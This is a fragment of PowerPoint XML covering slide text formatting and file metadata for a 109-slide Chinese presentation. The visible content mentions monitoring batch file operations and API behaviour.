                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>动态监控批量文件操作</a:t>
              </a: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UyZTI2MTkzNDY1ZGJlZDVmMzg1ZjY0MTk2ZGEwN2UifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="b6972ee9-3e13-4675-a39f-a38d121decb7"/>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340,&quot;width&quot;:9735}"/>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095,&quot;width&quot;:9750}"/>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55d8608b-a034-4bee-a367-a76244eeaeea}"/>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55,&quot;width&quot;:978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735,&quot;width&quot;:864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6d4a9f0f-ce02-4a6e-a0d8-c8255ced7bd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70,&quot;width&quot;:9720}"/>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00,&quot;width&quot;:9525}"/>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39d05801-c309-472a-8d46-48ff6cdab90c}"/>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90,&quot;width&quot;:10283}"/>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293,&quot;width&quot;:118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TotalTime>
  <Words>20577</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1176</Paragraphs>
  <Slides>109</Slides>
  <Notes>72</Notes>
  <HiddenSlides>19</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109</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="120" baseType="lpstr">
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</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API行为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katherinechan608@gmail.com</cp:lastModifiedBy>
  <cp:revision>499</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-24T04:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-19T05:49:44Z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6C2C963E696A41E69D745348C00EABED</vt:lpwstr>
  </property>
</Properties>
</file>